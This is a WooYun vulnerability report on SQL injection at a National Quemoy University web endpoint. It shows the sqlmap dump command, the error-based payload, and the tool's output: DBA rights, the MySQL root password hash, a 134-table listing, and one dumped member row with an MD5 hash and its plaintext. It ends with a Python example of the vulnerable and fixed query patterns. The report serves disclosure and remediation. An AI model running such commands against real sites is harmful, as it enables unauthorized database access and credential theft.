
Defect ID: wooyun-2015-0148805

Title: SQL injection at a National Quemoy University endpoint (DBA privileges / root password leaked / 134 tables / user credentials leaked) (Taiwan region)

Vendor: National Quemoy University (台湾国立金门大学)

Author: 路人甲

Submitted: 2015-10-23 10:41

Fixed: 2015-12-08 16:52

Published: 2015-12-08 16:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organisation (HITCON Taiwan vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-23: Details sent to the vendor; awaiting vendor handling
2015-10-24: Vendor confirmed; details visible to the vendor only
2015-11-03: Details disclosed to core white hats and domain experts
2015-11-13: Details disclosed to regular white hats
2015-11-23: Details disclosed to intern white hats
2015-12-08: Details disclosed to the public

Summary:

An endpoint at National Quemoy University is vulnerable to SQL injection (DBA privileges / root password leaked / 134 tables / user credentials leaked)

Details:

sqlmap test URL: http://**.**.**.**/orgstuff/index.php?code=list&ids=1&launage=gb

python sqlmap.py -u "http://**.**.**.**/orgstuff/index.php?code=list&ids=1&launage=gb" -p ids --technique=E --random-agent -D km_kmit -T km_member -C ID,member_username,member_passwd,member_email --dump

Proof of vulnerability:

---
Parameter: ids (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb
---
web application technology: PHP 5.6.7
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current user is DBA: True
database management system users [1]:
[*] 'root'@'localhost'
database management system users password hashes:
[*] root [1]:
password hash: *063BBBCB4AFA236F83D1CDACC781DF3DDF0C4801
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ids (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb
---
web application technology: PHP 5.6.7
back-end DBMS: MySQL 5.0
available databases [5]:
[*] information_schema
[*] km_kmit
[*] mysql
[*] performance_schema
[*] test
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ids (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb
---
web application technology: PHP 5.6.7
back-end DBMS: MySQL 5.0
Database: km_kmit
[134 tables]
+-----------------------------------+
| km_album |
| km_album_category |
| km_article |
| km_article_class |
| km_article_custom_field |
| km_article_custom_item |
| km_article_custom_uniqidfieldlist |
| km_article_exchange |
| km_article_group |
| km_article_type |
| km_attachment |
| km_attachment_category |
| km_attachment_item |
| km_attachment_order |
| km_banner |
| km_banner_new |
| km_bexchange |
| km_block |
| km_blog |
| km_bookmember |
| km_calendar |
| km_calendar_content |
| km_checkfile |
| km_chief_mailbox |
| km_chief_mailbox_log |
| km_chief_mailbox_setemail |
| km_conference |
| km_conference_content |
| km_conference_discuss |
| km_conference_hotel |
| km_conference_news |
| km_conference_photo |
| km_conference_record |
| km_conference_schedule |
| km_conference_signup |
| km_conference_traffic |
| km_conference_travel |
| km_conference_visit |
| km_discuss |
| km_discuss_article |
| km_download |
| km_ecard |
| km_ecard_category |
| km_epaper |
| km_epaper_channel |
| km_epaper_order |
| km_evaluate |
| km_evaluate_basic |
| km_evaluate_chief |
| km_evaluate_content |
| km_evaluate_data |
| km_evaluate_download |
| km_evaluate_item |
| km_evaluate_link |
| km_faq |
| km_faq_category |
| km_file |
| km_file_category |
| km_form |
| km_form_1 |
| km_form_10 |
| km_form_11 |
| km_form_12 |
| km_form_13 |
| km_form_14 |
| km_form_15 |
| km_form_16 |
| km_form_17 |
| km_form_18 |
| km_form_19 |
| km_form_2 |
| km_form_3 |
| km_form_4 |
| km_form_5 |
| km_form_6 |
| km_form_7 |
| km_form_8 |
| km_form_9 |
| km_form_userlogin |
| km_formvalue |
| km_formvaluex |
| km_formx |
| km_frame |
| km_ftpuse |
| km_gbook |
| km_glossary |
| km_glossary_category |
| km_hits |
| km_image |
| km_keywordcreate |
| km_kmit_back |
| km_layout |
| km_layout_change |
| km_lecture |
| km_lecture_category |
| km_log |
| km_manager |
| km_manager_class |
| km_manager_group |
| km_manager_job |
| km_manager_mark |
| km_manager_online |
| km_member |
| km_member_group |
| km_modeblock |
| km_modefile |
| km_modelist |
| km_modestyle |
| km_modetext |
| km_module |
| km_module_category |
| km_module_distribute |
| km_module_frame |
| km_mybook |
| km_online |
| km_park |
| km_park_apply |
| km_park_centre |
| km_photo |
| km_reserve |
| km_reserve_member |
| km_rss |
| km_rss_unit |
| km_setting |
| km_sign_up |
| km_sign_up_user |
| km_style |
| km_teachermem |
| km_template |
| km_tradebook |
| km_webstyle |
| t_album |
| t_album_category |
| t_photo |
+-----------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ids (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb
---
web application technology: PHP 5.6.7
back-end DBMS: MySQL 5.0
Database: km_kmit
Table: km_member
[15 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| address | varchar(255) |
| disabled | int(11) |
| ID | int(11) |
| login_ip | varchar(15) |
| login_time | int(11) |
| member_audit | int(11) |
| member_audit_code | varchar(255) |
| member_birthday | date |
| member_email | varchar(100) |
| member_idname | varchar(250) |
| member_passwd | varchar(50) |
| member_realname | varchar(50) |
| member_sex | varchar(10) |
| member_username | varchar(50) |
| phone | varchar(255) |
+-------------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ids (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb
---
web application technology: PHP 5.6.7
back-end DBMS: MySQL 5.0
Database: km_kmit
Table: km_member
[1 entry]
+----+-----------------+-------------------------------------------+--------------+
| ID | member_username | member_passwd | member_email |
+----+-----------------+-------------------------------------------+--------------+
| 1 | galio | e10adc3949ba59abbe56e057f20f883e (123456) | <blank> |
+----+-----------------+-------------------------------------------+--------------+

Fix recommendation:

Add input filtering.

Copyright notice: when reposting, credit the source as 路人甲@乌云 (WooYun).
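The report's fix is a one-liner, so the following added example (not code from the report or from the university's PHP application) shows concretely what "add filtering" has to mean for a numeric query-string parameter like ids. It uses Python and an in-memory SQLite table shaped like the km_member columns listed in the report; the rows, the function names and the regular expression are all constructed for this illustration. The vulnerable version splices the raw parameter into the SQL text, which is the pattern the error-based injection above depends on; the hardened version whitelists the value as a positive integer and then binds it as a query parameter, and it also stops selecting the password column, since a listing page has no reason to read it.

```python
import re
import sqlite3

# Constructed sample data modelled on the km_member columns named in the
# report (ID, member_username, member_passwd, member_email). Values are made
# up; the hash column is a placeholder, not the hash from the report.
SAMPLE_ROWS = [
    (1, "galio", "<hash-redacted>", ""),
    (2, "second_user", "<hash-redacted>", "[email protected]"),
]


def open_sample_db():
    """Build an in-memory SQLite database with a km_member-like table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE km_member ("
        "ID INTEGER PRIMARY KEY, member_username TEXT, "
        "member_passwd TEXT, member_email TEXT)"
    )
    conn.executemany("INSERT INTO km_member VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def list_member_vulnerable(conn, ids):
    """Vulnerable pattern: the raw ?ids= value becomes part of the SQL text,
    so whatever SQL the client appends is executed by the database."""
    sql = "SELECT ID, member_username FROM km_member WHERE ID = " + ids
    return conn.execute(sql).fetchall()


# Whitelist: a positive integer of at most ten digits (assumed limit).
_ID_RE = re.compile(r"[1-9][0-9]{0,9}")


def list_member_hardened(conn, ids):
    """Hardened pattern: validate the parameter against a whitelist, then
    pass it to the driver as a bound parameter rather than as SQL text."""
    if not _ID_RE.fullmatch(ids):
        raise ValueError("ids must be a positive integer")
    # The '?' placeholder is filled by the driver; the value can never alter
    # the statement's structure, so even a value that slipped past the
    # validation above could not inject SQL.
    sql = "SELECT ID, member_username FROM km_member WHERE ID = ?"
    return conn.execute(sql, (int(ids),)).fetchall()


def demo():
    """Run both variants against a classic tautology in the ids parameter.

    Returns (rows leaked by the vulnerable query, whether the hardened
    query rejected the input, rows for a legitimate lookup)."""
    conn = open_sample_db()
    injected = "1 OR 1=1"
    leaked = list_member_vulnerable(conn, injected)  # every row comes back
    try:
        list_member_hardened(conn, injected)
        blocked = False
    except ValueError:
        blocked = True  # rejected before any SQL is built
    normal = list_member_hardened(conn, "1")
    return len(leaked), blocked, normal


if __name__ == "__main__":
    print(demo())
```

Two further points follow from the proof section. The error-based technique sqlmap used works only because database error text reaches the HTTP response, so disabling error display in production removes that channel even where a query is still flawed. And the dumped member_passwd value is an unsalted MD5 that sqlmap resolved to its plaintext immediately; input filtering does nothing for that, which is a separate password-storage problem.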


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-10-24 16:51

Vendor reply:

Thanks for the report.

Latest status:

None